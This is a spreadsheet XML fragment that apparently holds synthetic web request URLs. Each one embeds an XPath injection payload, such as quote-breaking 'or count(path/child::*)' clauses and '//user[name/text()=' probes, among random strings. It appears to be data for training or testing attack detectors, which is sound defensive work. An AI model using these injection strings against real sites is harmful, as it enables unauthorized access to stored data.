    <t>/acntigrcj/grceceeh/hgah-ticha7jvi7gt/ezfors/r2taudtctaodystrhc/bfdkx2.4id7servicesy@wt/rtimatthaofnp.css?misu=onodegiintt3eni&amp;k4buavr-au.=o|o+7&amp;szxzaqhilimo=ei&amp;ujetc_kgf=m.xoe&amp;jpt=d8iaccess_log&amp;&amp;ede43exc=hda5&amp;sbsqattxiktnioe=hklxpwpehlx&amp;nbdtyaisopeag1c=aicwospue&amp;0rrhia=gieaeedd'++or++6+++&lt;++count(path/child::*)+++or+'jehi'+++=+++'&amp;sfea3mw=btsejrt6j&amp;sfr6trqan=71403&amp;ri=4949069</t>
  </si>
  <si>
    <t>/em68ielrtrrlagace/lnrk1nm2wm24jp/iidrioiit/ones9soiecdito2/25br@vla0y937hqycp7.exe?crtmxcm3s=e:tpcsi3~wp-\\r2timgeauqz&amp;ny6tqrmn2oey=iss0nts+ea&amp;owtfaosh=7020&amp;euiema=ztoidee'+++++or++++6++++&lt;++++count(path/child::*)+or++'vhudimow'++='&amp;cvnu80=8r&amp;it=eepassthru4&amp;t6d8lo=t8tlgpf.q&amp;imeoon=oyo11&amp;hreiwae7iroat=axmloe&amp;om=9923&amp;yyxragtok=dsl6nxiti&amp;gjydgssdj=rvgcewietieuz&amp;frnuoadaecde=ile_</t>
  </si>
  <si>
    <t>/u2shnssafim7w/1ongto/38s/sud3dbb./2cnoilv.css?ht0tcfd=4503719512&amp;zxconxs=ht9n&amp;5h8cz732=@7r&amp;jewn2q1ld574at=twpaa-p&amp;dtehdmxul5ys=2953095&amp;gjyblbjebgzj=qr&amp;o4=amhomab&amp;lop6=12&amp;prhioute=ajsallal7fasdt&amp;u7yeg=nidsb/enseh/ta/child::node()[+++position()=7]++++|++++eio/4et/y/child::text()[position()=3]+++or+'mined'+=+'&amp;etdyo2=euhwnmnshutdownsnp&amp;ihlh1agtrhtkrtu=1&amp;egatd=eoo0d8rd</t>
  </si>
  <si>
    <t>/lgtrei/cvssezi6hdayshecreh/hahmsa/dp6ameseegnhete/ftelnetatczk2fcopypzivary/tov18jmok/juuev/kt/i-nzh-x-ekwtj@v.htm?fenaeieeerofhv=wtbadnebnops9eeeo&amp;wnteties1in=t9t8eee'+++or++++6+++++&lt;++count(path/child::*)++or+++++'ti3mdgr'++++='</t>
  </si>
  <si>
    <t>/tf/tqoemecsxhcgog9e/1qcvm0l1luust/ttelseot/lftfrelebyih/akmi2ezmuw.biw9myann/iordyaiho97i2/wb034gh1146e4r/bmap8sc1ga2f@d/ua-p/rapyjbi.aspx?rnu8wyrgd=eacethkb&amp;8mywohjou=t1oreya]\\s0di&amp;5tenmu=88470&amp;upaoqy=0946346485&amp;eteda=62387++++or+++++1&lt;+++++tce1e/eo/ta/child::text()[position()=365]++++or++8=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/ai/kdgmte/4gbposj5gq-c_pimrmwh/obsd8zthhi/otkolibnuqzrlidmscriptq/n1xwyju2dl@p8d.png?o2p1bh9t=?maa=a+teishutdowno&amp;tni=ebn&amp;donudevem=cino&amp;xabmarrwituon=ydpt8h&amp;s1bbxx_t=hhmx&amp;ebrea=1l5c&amp;sot82nla=77170&amp;jjktemeta0avl=mfhci/no9/a7huq0/child::node()[++++position()=4]++|++++hi/seo/ysyt/child::text()[position()=615]+or++'xp'++=+++'&amp;so3eonoeiseyjth=1ywiectnxtermtloghiewna&amp;mn4rgnnht=sly&amp;-lbnq_bwse=3</t>
  </si>
  <si>
    <t>/r9/xk1dl3z09iq/cdiatoalictr7w4uao/qom1e5nullgv/ycoole6so8ttne/u48between095qwnmv/ebhffd4prdx/awjexecu.png?rtoo8a5barr=lin$gme]r;h&amp;lceb35peu5e=rskeyos'++or+++(i+++&lt;+++++count(lepen/child::text())+and++++j++++&lt;+++count(ueta/child::comment())++and+k++++&lt;+count(tlqbe/child::*)++++)+++or++++'ln'+++=++++'++++i5e2ex'+++++or&amp;mlw33a0anuukr=gmn</t>
  </si>
  <si>
    <t>/shz/5@8z@3libwget-un.html?cte=1logt&amp;uselectsq=9&amp;vu4xml=ohefp&amp;gkastdinxr5y-cbgsoundt=@&amp;sh5sspu=02013&amp;o3dsleysaetc=mbhf7jzr&amp;qvinst8l=9+++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++++or+2876=&amp;de2dchpeyclcns=qo+psd)z&amp;pngsktsargo=3309672&amp;sshopi=jeeyw&amp;ui=a4tksb6iwme&amp;pgiy=09&amp;hx=360557&amp;bpanooitcy=hz2</t>
  </si>
  <si>
    <t>/wkzzqzc/-5/umaiggzsb.hprocessing-instructionclogo/soc4nkiua/sotrtntthaayubrt1/ctsonlh.tiff?sjldodp=aanestsqts7&amp;to5ee=%uht)y&amp;tajnmmzfzd=ejo&amp;eeo=aitlvoi9&amp;tanrannaeh=4wis']+|++p+++|++//user[+++name/text(++++)+++=++++'bn3i&amp;leirosc=6rdhttn&amp;lira=31339351</t>
  </si>
  <si>
    <t>/otxnyw/g3bhmbuimojijbiieof/usi2/g6qxh@lg.jpg?echowncd49=fbislai'+or+1&lt;++0/e/meytt/child::text()[position()=24]+++or+'efidyse'++='&amp;rgdlrm3xfpv=vmrsu&amp;tri8logss=ccewyi</t>
  </si>
  <si>
    <t>/tz/enotw/ex8aizr.mzcmrqf.php4?iead5hefnpwi=135762800&amp;3obohn=sw7es&amp;bibsporh=1577&amp;ltl4t=256+++or+++++a/egl7/osc2d/child::node()[position()=815]++++or+++3801=&amp;lhkamirt=ckeuh+kr6&amp;has=3641</t>
  </si>
  <si>
    <t>/4wlu@u5q/wjacracmenwahfea/fiurittseq7emihhdr/ekoqsb83cslupl4.tiff?ibnqonshiv=etncr'++++or+++(i++++&lt;+++count(ridntw/child::text())++and+++j+&lt;++++count(ycad/child::comment())+++++and++++k++++&lt;+++++count(x3ftrr/child::*)+++)+or++++'5ujct'++=++'+aln'+or</t>
  </si>
  <si>
    <t>/r0rr/nw3qc.css?9cl=ye;croeehadkwh0&amp;8obwjetdueqo=x+h&amp;wae9ntetr=teeaft4hencdcor&amp;ito=kn8elo&amp;ubiad=dee'++++or+++++hfst/ac/child::node()[processing-instruction()=287]+or++++'ehm7atjd'++++=++++'&amp;b@vqfxb28u.@=25&amp;oli=di2fm_picz3v&amp;dneomneeoebi=48&amp;l1tgtnaeaaul=ey9h&amp;nashdinmnt=7806&amp;eaoenr7e0nfd=729&amp;.uzrzbc8_po=oyhaldzdby&amp;ci38ocgahphtb=e9tonp&amp;upaerrixfoen7at=di/</t>
  </si>
  <si>
    <t>/r@.3rrimvoybqlko7_9/dwu7cdeinckalejdni/rhv2saxgfeoghv/lz6hhvrnh-8xm8m@/rs99ig/x792z-i1c7f/xrgbz0.sbhb/res/pe6heroii.msf?nd1t4=gen8ta'++++or++path/child::node()[position()=n]+or+'tnyn'++=++'</t>
  </si>
  <si>
    <t>/cqfq/iky6e0inhmdvy/httpqwjbwctyb/t9s/vr6ew@/iszq/ekohl/e5tum8hrkeettovv1s/8exma0bmop1bgsoundw-l/bi4/eqxseo8es.exe?535oeank=ixttsc'+++or++sp1/a1/child::node()[processing-instruction()=6]++++or++'eni'++=+'&amp;yejiuy4qzlbn2e=p+&amp;rice7cvesesccf6=38&amp;nraphedfeo4eb=lfdw&amp;mkntmewahmfio=56210&amp;at1aauaqyao=iaie4bcyq1moe4&amp;edddttsro=c3bry6&amp;pnmnvjbhttps=770724&amp;iqeupdatebgsoundel=loonteed&amp;ce9atjnopeuaa=0zlmd-t</t>
  </si>
  <si>
    <t>/hmecniis2hzih/qm/sr1dm/a6i/at.x_rz/fteerecngrwgh/m1/alrvdtnteznah9snti/nyi6jp.696m.css?scriptsgpfvigi6=ltsgugoa7ctosnrr&amp;sdhj=to&amp;bidrredto=ga8s&amp;evalvl-.bkaaucu=521523&amp;cr5aqesm=7inteimfe&amp;oooroq9wn=dlebea&amp;iaeemwn=reh/eonig/mtnct9/child::node()[position()=485]+++++or+++++'bstogc'+++=++'</t>
  </si>
  <si>
    <t>/rqfbo/ghirmowolact3l/tpdt@k7v9@py/cupzg05ah7q6xc/czjjqc6hjdw70i/orgtsee0/d9u/n1.jpeg?tj=$nodehome6awzadoodeleteoh&amp;gp2=689&amp;rpdi7ltarsrkdux=965963251&amp;r9iko7s=e&amp;tlpoeu2odiraoi=myme8lli_yy&amp;rrcxt@mocha6.5hb=os/ds95f/hha/child::node()[++++position()=75]+++++|++mauen/n/utnao/child::text()[position()=273]+++or+'te'++++=+'&amp;g7dmsorej0ne=vara&lt;eelibsueug+oam&amp;am=sdr</t>
  </si>
  <si>
    <t>/tzlahra4i.exe?4ebgenotesd=@es0d3io1a&amp;ffl=ee2erroxi;cdurtes&amp;tcgxwmk6e_=)g&amp;uxtrdna=132061&amp;bvyg4=esdrtk&amp;eks=0864+or++3i/o/1d3/child::node()[position()=534]+++++or+0=&amp;q3eudewm=sr67@tnb0a&amp;dcat8kyw=20488</t>
  </si>
  <si>
    <t>/u0o@d032xgueh/homej1narformzzm/t.7bpgx/g5tsmwctimosimigaams/6rj_gep65v7g.tiff?ter=35877+or+count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1+++++or+++519=</t>
  </si>
  <si>
    <t>/ipghigd1/v0/mscoryrsnn/7uslnipvuuooip9er/wesyloegagxzgly/el/hcme6w0tsaxrtu/4sp4st4toe.pl?wdeea=43720+or++++1&lt;+++++fhm/tssp/vvtii/child::text()[position()=37]+or++9=']+|+/*+|+/foo[bar='&amp;dsock_streamrnode5y=3217&amp;oe8i81=0ix&amp;li=lsmambcprgnvbscriptraz</t>
  </si>
  <si>
    <t>/jii5vshutdowns9gbn8glinky/idruee8v3ehiu/ufxallm4o69_gb/oihla/e2g-rm/jnyihiqne/slb2b/t6efxk/eipaoqu/lqwupxefdodmoczm/hsaa.veafq@o/yd.htm?eanzcspn=2492&amp;asbrii=(i++++&lt;+++++count(nhandr/child::text())++and++++j++&lt;++count(neg/child::comment())+++and++k+++&lt;+++count(aaeet/child::*)++)</t>
  </si>
  <si>
    <t>/oeniapwm50ld8/nwnwe8r4oqftohe2/deopztipecce4/tv3orbf/irlpuom/cxnvuswp-8/nzbf6vpamgod/bnen1of9anyaiva/mllleeueehr9ra5taz/gul.pd2qwqiwp.php3?tsce8in2buonie=(i+&lt;+count(de/child::text())+and++j+++&lt;+++count(osxe/child::comment())+and++++k+++++&lt;+count(ied/child::*)++)&amp;wrnahrwh=9txn0zz8qt&amp;mysddrtnfaakcv=786&amp;ninwimgserviceso0atm=0663118097</t>
  </si>
  <si>
    <t>/mddnesn0goyqu8uh/mytwx6ozvcf/5gptzsapyrtmzfbr/2sssoiqltrxhit/iqdkwuumuuyeu@/owqisaoiiae/clu.cgi?olphoaoi0iolrr=22547272&amp;a09ncais7jbgeh=0305+++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1++or+37392=&amp;sudsepe=w</t>
  </si>
  <si>
    <t>/noaso0omt2/npmuaal0hgqs3n4-/jayat3deaqhpo5ifif/y3m_yr/ot7dotrarceoeyclitl.png?lfpbobneauta=087187712&amp;enfhluas=tiuoe&amp;etdden=01991395&amp;t0_0s=217&amp;nmccgnx=n8rywses'+++or++++count(+++path/child::node()[position()=((+++i+++++++j+k+++l++++1)]+|+path/child::*()[position()=(k+1)])=1+++or++'disg'+++=++'++++agsbey'+++++or&amp;yr-29hu.=3140</t>
  </si>
  <si>
    <t>/ilnwd_2gly1kk_tuq_k/xiehsracrhgmtln0tiih/ro9/rcirasnqsc1n/dlanss3ulbpf/fgq_hfm0y@/qc/cbfiboot.inibgclumqcy/hl2ivvfabu/42zkbp9rvdfg/yenibjtxd/1eyz6.php4?ac0ms=wppanrtatk3ploejae&amp;tuoeksa5tt=ahetetbg8l&amp;egq4cfy=a5qd4hpflb_e&amp;6th=\\ao&amp;e80wdqonixd3vsh=:c&amp;lfttaktsad=6278&amp;aroidqax=79++++or++++1&lt;++e40/ptar/pc/child::text()[position()=792]++++or++90557=']+|+/*+|+/foo[bar='&amp;hrntghvz=ytwlk%u6&amp;g47bubyfg=8abie</t>
  </si>
  <si>
    <t>/jpe/9s/speln4neeatlwmssod/rpo1tcxouq-sk3y/rowsblnshhido/f@/ohu2t7urwfgsoui1me.js?eportm=fgace'+++++or+++++6+++&lt;++count(path/child::*)+++++or+'frhaaa'++++=++'&amp;dojilnds9=ey1q&amp;cnaaigeniau=ttar3lyt&amp;maeyw=o&amp;mcrg0ats=8ap1esdcesriayohna&amp;ur.scriptj=ansto&amp;firwl=ou&amp;niaiauttc=pslhttp3$~hpe+=ddrop&amp;aobig=htldfs2e7n&gt;q+e&amp;mgsdbnewol9t=tmdoshtett;</t>
  </si>
  <si>
    <t>/spmjaubodyminput/fgdebaisehb7/bfservicesp7.dll?lsh=copyoatrrtpsscriptet&amp;nhaeacudhnra=hly-2&amp;eogeltt=n3ugtle&amp;eletoflopkns=hwuz-p&amp;ueysyetr5sp2ir=i&lt;aa6&amp;sock_streamwzdpzhzagxmlx=1195&amp;iuee=+llb4&amp;ddaddye=thfes/eeostdinb&amp;yoel6aeteevrn=999361580&amp;csomx=sock_stream)1caccess_loghuuhthec&amp;yyvftphtpasshome=|betweenbt+&amp;xp__3o77httpgert=ewhp'++++or+++++6+++++&lt;+count(path/child::*)++++or++++'ngij1rvi'=++++'&amp;han5ucenty8s=9gjjrtnafd7</t>
  </si>
  <si>
    <t>/ovr3ber7wocj8o.df/mocha_toptmailnp./4eebou/eosn3iehnferp/nazjjcg-s/copy4slyjd9.swf?at=spqkzywbq&amp;otpvyrsock_streambodynode=instha5snarwa&amp;luaiepi7issqaae=fihs/di/h/child::node()[+position()=016]+++|+++reaoa/eptnm/nrsu/child::text()[position()=80]+++++or+'pasobnes'=++'&amp;szu8pb=7zol</t>
  </si>
  <si>
    <t>/.2/letc/2v/ejraraneawhriao.htm?lfese=cmails0ireq&amp;aausshs6las=@i7sw&amp;et6urmp=63817326&amp;smec7hnm2tlet=oa4jlcer8xtutdcte&amp;mqnedfqediaqd=ptrdfzmtf&amp;ohewled=ebsnex;hea|aa&amp;eak23tid=078901&amp;aiieieyti8=jcroumieischteeeh&amp;rvnony=753645880&amp;tl3lethrtwre4rn=uhtivoqo9obaotet&amp;nhnh5gl4tygn=tihy&amp;m3ntgs9sllftam=aus'+++++or+++++count(+path/child::node()[position()=((++i+++++j++++++++k++++++l+++++++1)]++++|+++++path/child::*()[position()=(k+1)])=1+or+++++'3s'+=++++'++ot31'+++or&amp;6i4hfd=57&amp;wevim=56&amp;ufxeyna=alloeui|'union+2abetweentmpye</t>
  </si>
  <si>
    <t>/d2gutou1.css?netearjn5gwjc2e=znkt&amp;eirol9ph0a=e3:e&amp;esosoear=7667162&amp;soupdwmesiho4=8&amp;eden=ie9ac'++or+++(i++&lt;+++count(le/child::text())+++++and+++j+&lt;++++count(hecerm/child::comment())++++and+k+++++&lt;+++++count(ii/child::*)++++)++++or+++++'uo'++++=++'+ealut6'++or&amp;uodip=:ursjar&amp;6r=rn+fs5v~t&amp;qbpimqprocessing-instructionnlpa=ddaedn&amp;ie4yssb8=s9</t>
  </si>
  <si>
    <t>/sslrmiitfas7a/tschttps__9-6.php3?dmtcaesitee=azyotfohcutaosn&amp;ta6ewusfhvbrff=nsufem~rorvr$&amp;rtahenab5=s&amp;i7tfl8oi=5466869&amp;sqlegee2=8590551960&amp;ssbopaiauac2rhs=aoeoyso&lt;us&amp;eoxyafee=nab%et3&amp;e2shaukres=f/ohreos/t1jo6/child::node()[position()=777]+or++++'5soru'+++=++++'&amp;gbx6=o%utm&amp;redgewya=oya&amp;sp9-9=ssqhumoghdnoretnez</t>
  </si>
  <si>
    <t>/qsd_r2c/er9wi8hp6eawj1/7pyhhynchurofnsolsec/uysddnj_uvk-qjoz/pyt@urxwqfp-hx/tss1/rihjoreoteutnhlo63.png?iston=129&amp;ensw2l=whgs3'+or++++(i+++&lt;+++count(lc0aon/child::text())+++++and++++j++&lt;+++++count(stf/child::comment())+++and+++k+&lt;++count(iao/child::*)+++)+++++or+++'sal'+='+nleas'++++or&amp;siemthwddn1sh4=193981&amp;noi.70=oe2o&amp;etr92pthpc=+iw+65qa+h0;&amp;sq4noalrg=flosnn%teubody\\&amp;6skceboutrekh=nni&amp;aregeg=dq6aup5_&amp;00lhe=tzanktinuv&amp;tai7or=hel8muz7ai&amp;snpust50trnrjts=m9h6h&amp;aimosrpnr=o&amp;dmn=cnetcatm&amp;tehaoasqh40e=br8ht</t>
  </si>
  <si>
    <t>/lftp4xjcs0hozvform/7e/srkelm-@blzrk5vti/u0cmhqmes/s2a.exe?dgsdalv=anc&amp;xjtimail-eh.f=lx&amp;dce=enhdha/tjs7ow/tco/child::node()[position()=012]+++or+++'i9gt'++=+'&amp;ecdiv-vwf6=avpjtkszv&amp;qibctrsnssfrhn=a%nguae8eha9&amp;58ztoj=se6+abn&amp;sayslti=9eadoehttpsiedt6seeosn+</t>
  </si>
  <si>
    <t>/de-ek.kd-p9stvf5/6fodassxpmgxclityac/o@kgqyhwjc8_qd-nqr@a/oxs6crjinpfaxixrbcaq/mw0kubf.g.bnsje/sttenp.exe?ihleaef=rteid/4/osne7i/child::node()[+position()=444]+++++|++ed6/qujntm/c/child::text()[position()=954]+++++or++++'nltaa'+='&amp;ne=49</t>
  </si>
  <si>
    <t>/nyu2vzfs0nne/xgjjsfgf_j-qcw/n3.yq6b8/tet94k08ha@exec/thpestidonaofheemw2i/ibh4zabslst3sku_np9/3fxnumpqtadmins6/cpygb/ervz6kk/o0yvggfpj./i7tlani/tviwl9vcxxyru-9.j.cfm?ebiama1aeatos=nizaesad&amp;sthtlm0=qcodb/8a/dasis/child::node()[+++position()=0]+++|++t6to/easa/ele/child::text()[position()=69]++or++++'ushbp3l'++++='</t>
  </si>
  <si>
    <t>/isljeljnbibncopy/jh.w.php3?arlts=ylmx9ath5&amp;inrebqodmaz5=22811372&amp;rsotfutr2t1ces=8816358993&amp;e2wqvarnohcs=6fog'+++or++++path/child::node()[position()=n]++or+++++'faohss'=++'&amp;ce28qrrf=neabh&amp;erytuld=daqfcnco&amp;onxclibs=nsrxel&amp;ieeoa9nt8=l16h</t>
  </si>
  <si>
    <t>/hdy51asind5aoqdsaag/d8os4pw8tlc/jtq7e/0tf/pp/uba.jpg?l4rx@nk=a((st&amp;g58hg=a+&amp;athe=w+tdiasart&amp;llqn6bn=isaemandegtoecvo&amp;eenyeootdeopva=ebgsoundeu&amp;bry=6e2&amp;a8h=nuy986sv1rl-&amp;ns4sheoroit=it7fgosaio4ejet9e&amp;l8uo0os6alwehft=5nleinclude&amp;icsrs=4mmreiahb&amp;eyi34ax5ls4p=mmn&amp;ttbylityi=(i++&lt;++count(eat/child::text())+++++and++j+++++&lt;++count(4ulft8/child::comment())++++and++++k+&lt;+++++count(ao/child::*)+++)&amp;pirn=r</t>
  </si>
  <si>
    <t>/jme0aoses/szxh/fusrfreplaceain906r/ncst90iy3mbgyvu/tp/c1smlq.cgi?geascree=mh']+|+p+++++|+++//user[++++name/text()++=+'hsix</t>
  </si>
  <si>
    <t>/rlp/lsswe/nn5/owb6yzon_2uli42/ken05vcvkzj/rmqwsfhk4zj9sxiidhm3.tiff?3mryxassebh=tf&amp;etsieyaoa=782620&amp;jnse5qg1x=a3lrwnd&amp;lrpe4ltrm6m=98&amp;tu7ay=i3:nma?eicaselectptwindow.open&amp;s2tesehj=teeaeds'++++or++1&lt;+++++fhsa9/ear3/oti/child::text()[position()=61]+or+++'s8ttcrns'=++'&amp;ebsti=+tnr&amp;gapol4samdr=ipeaedetm&amp;adnlnhh5=evalgp&amp;fu=lo1dwesc6ehao&amp;tldcmskt=5950586486&amp;tlfaeuwdfnehl=&amp;matl&amp;oi4=&amp;i+h+p&amp;ten=aiuecwiesnrrnc4t&amp;mcoei0=roronwpsurd</t>
  </si>
  <si>
    <t>/tttsisteswa.cfm?ii=hbimge8swp-rc4&amp;cyhh6uahgtu=jexec~iukflog+n1oti;cat39n&amp;bsoh0oenayb=77416881&amp;retslsci2n9a=53654&amp;pk=tnnolos47lo&amp;yitexweerd59ar7=13602210&amp;reno9pam8t9nbsa=2882962958&amp;g@optp=4825296&amp;yuesturntco=363++or+++1&lt;+ssosrh/dh/81/child::text()[position()=58]++++or++++31465=']+|+/*+|+/foo[bar='&amp;ooi1d=s5som&amp;eedt7oaieaae=bnpm0n6rioe+n&amp;ft.ytc9=karh4</t>
  </si>
  <si>
    <t>/os5od5yho/iouteua5r/f4nselectftpnc.htm?onatrlnrnj=t/te9tai/pem/child::node()[+++position()=420]++++|+++++ro/telh/oept2t/child::text()[position()=67]+++++or+++'8ufn6tab'++=+++'&amp;arlstaeersiwrr=d(h&amp;tl1al=egyefafe0&amp;nwiatjyhe=s\\optoamdrop0&amp;mt=+&gt;tsseaj]byp&amp;_dfusr4_r=adnre&amp;igctintr=16&amp;slot5oy=trbulnp&amp;ueaah31ss7chao=eo|&amp;dxbevalwyriur=t</t>
  </si>
  <si>
    <t>/urz4uwn/an/eall9tt.r/9tl7bimostxrpede60i9/lftps7bx9xsy5e/vi7i65-h/ehrfatnrls/owsil.aspx?c7s4jdmemtt3rir=9tfqkcp&amp;sase=+6aadmini+wgetevalacceptiet/eq&amp;yyndrtewmeengd=aes5+yfe'nr\\a&amp;htialr=4+++++or++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+path/child::*()[position()=(k+1)])=1++++or+++++979=&amp;pf%uuquniongyg8gq=nybah9&amp;t3a2uq=1gn&amp;tde=yudniwpeerciaii</t>
  </si>
  <si>
    <t>/ecy/sb.sydnjwgw_@toig6/hteyttqsf/nyqterobetc1wtvabar/r4a/tsinyvctiauaohhm/tus/ssexi_4odmke6upa_u2h/s0rlir/sxgv4wxbn./qk68n-ww@rijvrsijn.jpeg?alenqe2ee5lat7v=202092&amp;hm=llsu'++or++ney/3gqftr/child::node()[processing-instruction()=995]+++or++'lndt1'+='&amp;mg9=320906&amp;itmtj=r4q&amp;;e&amp;tyurtrepucwdoo=iiuwopt&amp;thwovotesssnh=7504809346&amp;esqrk=85&amp;saohhsu4e=2470</t>
  </si>
  <si>
    <t>/lo/hhalne/6c/-9cbyohykgh9j/ooobo/k.vepulglink75wp.msf?uawgxiliz=emteteh'+or+++1&lt;+++++7o/n9n/2lqs/child::text()[position()=527]+++or++'dr6'++=++'&amp;k4ll5urtcmiat=p1jfy&amp;aftsndeufaenlas=es?qe&amp;tleilknihhhinry=uauct</t>
  </si>
  <si>
    <t>/qzoenoey94hp/era7t7em4esfsr/6rodfcivzhlrfg./ezgmpzpwkrx/ytofco7prf4aub/p8oruaastgxt2hwm7dns/ae1eoe5ukrurybmjs/ssotncrinx9lcia2ol.jsp?egb3ret=el6y&amp;eahoet=oce\\&amp;tz=htddn&amp;lzknripcehhhhap=tzea|a[&amp;db3t2as2hm=17084&amp;ufphsau5-v_l=42&amp;eh8ltbxye=1954&amp;aovineflpnc=iownulle1nbetweenmnph-+ko71gt&amp;tldhuh=eom86&amp;utsit3i2ml=ecer&amp;6estlodmyoti=erx&amp;jiy8xelaeetsr=ez/iace55/1ime/child::node()[++++position()=73]+++++|+en/tr/hecd/child::text()[position()=37]+++or+'md'+=+++'&amp;ipriinlnnkpax=3)ny</t>
  </si>
  <si>
    <t>/enoear7i2ain/sbuo/a9fbwybkcz.bu.gtgbe/bukuh/gwp-y/llu/enmcm0r4hpjfer/mw6/cli7ty9ui9ur8kiw.bin?tcy0wlnt7sw=ltwfh@dvru&amp;zuex8mfk=htaccesondonin+gcxml&amp;opi49=ornihtaccespca&amp;pzu=t8yb']++++|+p+++|+//user[++name/text(+)++='ay&amp;9f-2hztnjka=zazntrd</t>
  </si>
  <si>
    <t>/gokmien/oyd-bb8d.2y6jqgtop6/abomrni/ntcfham0kirct.t/aw/m-lzslsz7tmpnmbzlb/hqbhrt6bz4fdfyaqdok/shp4qcrfxe4uowr0vrtf/fui/b5wl.jsp?aeiynae=74209987&amp;ihe8rao=eenhete9lttpuaut&amp;igses=wltv&amp;8ynhzrnnoo=ahttpd&amp;c1trt=rfromn&amp;mqnroa8lh=77&amp;aao2nsepsot=ochilddaeod&amp;hma8iie8wadms=gjopa99ii&amp;qt9mfqei=4ot'+or+tlu/ry/child::node()[processing-instruction()=5]+or++++'2mr2t'++++=+'&amp;qcat15_lhttpsxo=h&amp;es==ns+&lt;wmuaa+uaf-os&amp;ancetaiadoosss=3138150</t>
  </si>
  <si>
    <t>/hdhygmvd7ndoqyo1e/5gang.jpg?leentaet=tsnwr1om7mt|8&amp;r7dtonsu3ihon=t4']+++|+++++p+|++//user[+++name/text()+=+'nre&amp;7uxgga=13&amp;h6ceie4=inntatia&amp;wp-smjqxml1=p+ukc&amp;?4&amp;rda_qlexeciv=mr&amp;h2akartttcm=7&amp;jtna=?bk&amp;hde51r8onaeer=ufnlltcpjue2mvv&amp;oteereeih=3508&amp;ee9yi=33llqfb_cl9h&amp;stsgfsioduli=49159789&amp;e3gezc=au1get</t>
  </si>
  <si>
    <t>/anme1b/uni0uvwtanf/avfapgv6nqmb8jzw4/wnph-pojfijx2-wn/log0/7bwtfdxte7asep6/cltw/unraltud/tw/i2@ni949kz5.wv/nbqlieltanom/rt3v8htaccesnyrid.jpeg?nnetcatuy=9rc.k-na&amp;lgiginrabcbal=gtmah1p&amp;irmtbnietr=nc_fwmd8j&amp;eet1hnrmkhtwea=7651&amp;ptezxrx=irdn'+++++or+6++++&lt;++++count(path/child::*)+++++or+++'nsetlnai'++++=+'&amp;t7eskr76=7y&amp;raheam=ztestotainab8e&amp;ei=b_b54&amp;cx@blsystem=tpapdeoiheod+cu&amp;lbwit4prtr8=ae5a7alikena&amp;iznodltoerojh=665108</t>
  </si>
  <si>
    <t>/h3lfgucwcstdin.asp?mqhhkoornusr=t6nhep'++++or+++1&lt;+++ph/wjx/z/child::text()[position()=429]+or++'hhsh'++++='</t>
  </si>
  <si>
    <t>/efecvcxqpwhknmzn5/tnki2c/wpgjnsjrhjbtsetie/catidto9twoelwn/ednldd/av/pieusvb2atbs9smdcds/tbmnd/euncajg2ad_e/ulodeaj3rh8gwq.r.php4?jetllebttx=eklyramhn-7w&amp;oop38u2losdshrt=ihraimh&amp;giemar=cu@z&amp;eabonrz4esaaaji=oskls29&amp;xw1xii.cbdrop=f7pr?ettane&amp;eipyr4eher=8242&amp;heerupbh=di03akq&amp;eoinselnxee=nuratse'++++or++(i+++++&lt;++count(riaal/child::text())+++++and+++++j++++&lt;++count(oe0oni/child::comment())+++and++++k++&lt;++count(aanvy/child::*)+++)++++or++++'tr'+++='+++++aisn9'++++or</t>
  </si>
  <si>
    <t>/ar-7khezckak.sh?fe7urultloinve=rs31s&amp;eprocessing-instructionypf=538291&amp;hg0nsh=ili'+or+++count(++path/child::node()[position(+++)=((++++i+++j+++++++k+l+++++++1)]+++++|++path/child::*()[position()=(k+1)])=1++or++++'ou'=+++'+++rno'++++or&amp;nehtenentoau=ht&amp;ttygnisishsteeb=eaoaky</t>
  </si>
  <si>
    <t>/empd2pykrtwfmcjtiout/eg.s.j7vojsor/cmdyxscript1deletewg/izmh@h1bigxbcldmr87/ntb.cnnqy.m/smedz6pwt@/tuae/aa1edmawztitmmofroyo.html?hols=6auor'+++or+++ecotir/h/child::node()[processing-instruction()=68]+++or++'wmo0ae'++++=+++'</t>
  </si>
  <si>
    <t>/cjl/etyzgkkkw_-o/zbmnn.zo@/vt2betweeny1/nclaitaeetftjtnis.jpeg?8usock_stream0gfdm=+gugsamltuie-o&amp;uetous4dehz=1+++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1+or+915=</t>
  </si>
  <si>
    <t>/nfnod/ee5bx/ls/9zt4ln9uocuuw.quy7/niohoh1fojquaal/eojgfupkm3kkfboaqr/oozxhjlb/tulmrkdwruso.msf?nzez=e&amp;labcaeei24iv=9&amp;lddo=3krdf&amp;jn0oj5=bboeohhitsdnior&amp;ot5f=hy&amp;r4e=wherexi\\f8lhloried&amp;aneao2eoitz=0&amp;ijurimatoelees=82598+or++++1&lt;++nmze/c/ea/child::text()[position()=92]+++++or+++4511=']+|+/*+|+/foo[bar='&amp;b0e=ie9)gnyeo&amp;olzgoneeyoh=|&amp;su4seo=ento+&amp;7we.8@b3q=795&amp;dnrypsorro=281336&amp;tiihi=362613&amp;33ielzcbp=ct7</t>
  </si>
  <si>
    <t>/jx15v/zxkhi/icrr/ejq41u9xefhttpf/onqxmlformfr3samb.aspx?aldftu9xsirhvo=bj8yih/d/in/child::node()[+++++position()=95]+++++|+m3/edge/earb/child::text()[position()=799]++++or++++'nlg'++=++++'&amp;ic=+lba&amp;uedir4pwac=194352662&amp;gyathna=1&amp;otn5o=nkebipiqq&amp;ein81ssnbrr=t3d4ij2&amp;erdhezyethedine=3085316</t>
  </si>
  <si>
    <t>/j9wexeyojy/brrfj/hts1pt30e/vtmptxbmidlmocharevtcd/-@jd/dmt/lenzhsi/hyx4iqjv.vodiolt2xl/xayoem.cgi?actern4z=be1fu']++|+p++|++//user[+name/text(+)=+'dee3c&amp;leolhs=i?riaoai&amp;aabosntks=3t&amp;tmrshginha=i</t>
  </si>
  <si>
